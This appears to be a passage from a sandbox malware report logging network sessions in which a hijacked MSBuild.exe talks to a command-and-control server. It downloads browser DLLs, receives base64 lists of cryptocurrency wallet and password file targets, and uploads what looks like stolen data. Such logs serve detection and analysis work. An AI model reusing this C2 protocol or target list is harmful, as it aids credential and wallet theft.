                                                                                                                                                                                                                    Data Ascii: ------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------DAAECAFHDBGIDGCAEHJECont
2024-10-03 13:14:48 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:14:48 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 56242 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:48 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:48 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------HJJKFBGCFHCGDHIDAAECCont
2024-10-03 13:14:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:14:49 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 56244 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:49 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:49 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------BFCGDAAKFHIDBFIDBKFHCont
2024-10-03 13:14:50 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:14:50 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 56245 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:50 UTC | 195 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:51 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:51 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Thursday, 03-Oct-2024 13:14:51 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 56247 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:52 UTC | 195 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:53 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:52 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Thursday, 03-Oct-2024 13:14:52 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                    Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                                                                                                                    Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 56249 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:54 UTC | 196 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:54 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:54 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Thursday, 03-Oct-2024 13:14:54 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 56250 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:55 UTC | 196 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:56 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:56 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Thursday, 03-Oct-2024 13:14:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                    Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                                                                                                                    Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                                                                                                                    Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                                                                                                                    Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 56251 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:57 UTC | 200 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:57 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:57 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: close
Last-Modified: Thursday, 03-Oct-2024 13:14:57 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 56252 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:14:58 UTC | 192 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:14:58 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:14:58 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: close
Last-Modified: Thursday, 03-Oct-2024 13:14:58 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                    Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 56253 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:01 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 1081
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:15:01 UTC | 1081 | OUT | Data Ascii: ------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------BGDGHJEHJJDAAAKEBGCFCont
2024-10-03 13:15:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:15:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:15:02 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 56254 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:02 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:15:02 UTC | 331 | OUT | Data Ascii: ------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------BAECFCAAECBGDGDHIEHJCont
2024-10-03 13:15:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:15:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:15:03 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 56255 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:04 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:15:04 UTC | 331 | OUT | Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------CFBAKKJDBKJJJKFHDAEBCont
2024-10-03 13:15:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:15:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:15:04 UTC | 1524 | IN | Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 56256 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:05 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFID
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:15:05 UTC | 461 | OUT | Data Ascii: ------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------EBGDHJECFCFCAKFHCFIDCont
2024-10-03 13:15:06 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 13:15:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 13:15:06 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 56257 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:07 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 130417
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 13:15:07 UTC | 16355 | OUT | Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FBKFCFBFIDGCGDHJDBKFCont
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 61 56 67 54 75 4d 4c 45 39 41 50 55 56 36 44 2f 77 6b 73 50 38 41 7a 2b 61 4a 2f 77 43 44 51 66 38 41 78 46 65 56 69 4d 4b 6f 79 58 73 62 74 4e 4a 36 2b 64 7a 30 61 57 49 30 66 74 4e 48 65 78 78 33 69 33 51 57 69 4d 6d 71 57 32 6d 58 46 72 62 35 7a 4f 6b 6a 52 62 56 4a 49 41 4b 37 58 4a 35 4a 36 59 72 6b 4d 49 66 61 76 55 2f 45 31 38 75 6f 65 42 39 51 6c 53 53 31 6b 41 65 4e 63 32 30 2f 6d 72 39 39 4f 70 77 4f 65 65 6e 30 72 79 75 76 61 79 69 63 33 54 6c 43 66 52 6e 7a 4f 65 30 34 4b 74 47 63 46 38 53 31 41 78 2b 68 7a 54 53 70 46 4f 7a 53 68 7a 58 72 6e 68 33 5a 46 69 6f 70 62 6d 47 46 67 73 6a 37 53 52 6e 47 43 61 74 5a 55 6e 6c 66 79 71 74 44 5a 32 6c 39 34 70 30 2b 79 75 33 6b 57 33 75 48 53 4a 32 6a 49 44 44 63 78 41 4f 53 43 4f 70 46 52 55 6c 79 52
                                                                                                                                                                                                                    Data Ascii: aVgTuMLE9APUV6D/wksP8Az+aJ/wCDQf8AxFeViMKoyXsbtNJ6+dz0aWI0ftNHexx3i3QWiMmqW2mXFrb5zOkjRbVJIAK7XJ5J6YrkMIfavU/E18uoeB9QlSS1kAeNc20/mr99OpwOeen0ryuvayic3TlCfRnzOe04KtGcF8S1Ax+hzTSpFOzShzXrnh3ZFiopbmGFgsj7SRnGCatZUnlfyqtDZ2l94p0+yu3kW3uHSJ2jIDDcxAOSCOpFRUlyR
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 6e 2f 54 72 2f 79 62 2f 67 48 74 50 39 73 36 56 2f 30 46 4c 4c 2f 77 49 54 2f 47 76 4d 66 46 30 38 4e 7a 34 6e 75 35 59 4a 55 6c 6a 59 4a 68 34 32 44 41 2f 49 6f 36 69 73 53 69 75 6e 43 5a 5a 39 58 71 65 30 35 72 2f 4c 2f 67 6e 46 6a 38 35 2b 74 30 66 5a 63 6c 76 6e 66 39 41 70 4b 57 69 76 55 50 45 45 6f 70 61 4b 41 4c 2b 67 75 73 57 76 36 66 49 37 42 55 57 34 51 73 7a 48 41 41 7a 31 4e 65 75 66 32 78 70 6e 2f 51 53 73 2f 2b 2f 77 43 6e 2b 4e 65 4a 30 56 35 75 4d 79 37 36 7a 55 55 2b 61 32 6c 74 76 2b 43 65 7a 6c 2b 62 2f 55 36 54 70 38 6c 37 75 2b 39 75 33 6b 2b 78 37 58 2f 62 47 6c 2f 39 42 4f 79 2f 38 43 45 2f 78 70 50 37 5a 30 72 2f 41 4b 43 64 6c 2f 34 45 4a 2f 6a 58 69 74 46 63 6e 39 69 66 39 50 50 77 2f 77 43 43 64 2f 38 41 72 48 2f 30 36 2f 48 2f
                                                                                                                                                                                                                    Data Ascii: n/Tr/yb/gHtP9s6V/0FLL/wIT/GvMfF08Nz4nu5YJUljYJh42DA/Io6isSiunCZZ9Xqe05r/L/gnFj85+t0fZclvnf9ApKWivUPEEopaKAL+gusWv6fI7BUW4QszHAAz1Neuf2xpn/QSs/+/wCn+NeJ0V5uMy76zUU+a2ltv+Cezl+b/U6Tp8l7u+9u3k+x7X/bGl/9BOy/8CE/xpP7Z0r/AKCdl/4EJ/jXitFcn9if9PPw/wCCd/8ArH/06/H/
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 62 47 57 58 44 41 48 37 71 38 4e 75 48 79 6a 6a 72 6d 43 33 30 72 55 6f 4a 4c 43 52 6a 42 4a 4a 5a 57 39 78 62 78 73 2b 53 57 57 62 7a 43 35 62 6e 6b 2f 76 57 77 65 4f 33 57 6d 35 35 68 62 34 56 66 38 41 34 48 2b 5a 4d 61 65 55 71 2f 76 50 38 65 2f 2b 52 30 31 70 43 31 2f 64 51 78 57 4d 6b 56 33 48 4e 61 6d 37 53 65 33 57 52 31 4d 59 63 6f 66 6c 43 62 79 64 77 78 67 4b 54 2b 48 4e 4d 6c 53 53 43 38 6e 74 5a 6b 4b 79 77 73 41 77 77 52 31 47 51 63 45 41 6a 67 6a 67 67 48 31 46 63 39 61 61 5a 66 32 6b 46 74 61 47 47 7a 75 4c 47 47 7a 65 7a 65 32 6d 44 62 5a 6f 32 6b 4d 76 7a 45 4d 43 43 48 49 49 4b 6b 45 59 48 76 6e 58 73 37 61 4b 32 52 68 44 61 78 32 71 48 47 49 59 32 5a 6c 58 41 78 77 57 4a 50 35 6b 31 31 34 61 65 4b 64 54 39 36 74 50 2b 44 2f 6b 63 4f 4e
                                                                                                                                                                                                                    Data Ascii: bGWXDAH7q8NuHyjjrmC30rUoJLCRjBJJZW9xbxs+SWWbzC5bnk/vWweO3Wm55hb4Vf8A4H+ZMaeUq/vP8e/+R01pC1/dQxWMkV3HNam7Se3WR1MYcoflCbydwxgKT+HNMlSSC8ntZkKywsAwwR1GQcEAjgjggH1Fc9aaZf2kFtaGGzuLGGzeze2mDbZo2kMvzEMCCHIIKkEYHvnXs7aK2RhDax2qHGIY2ZlXAxwWJP5k114aeKdT96tP+D/kcON
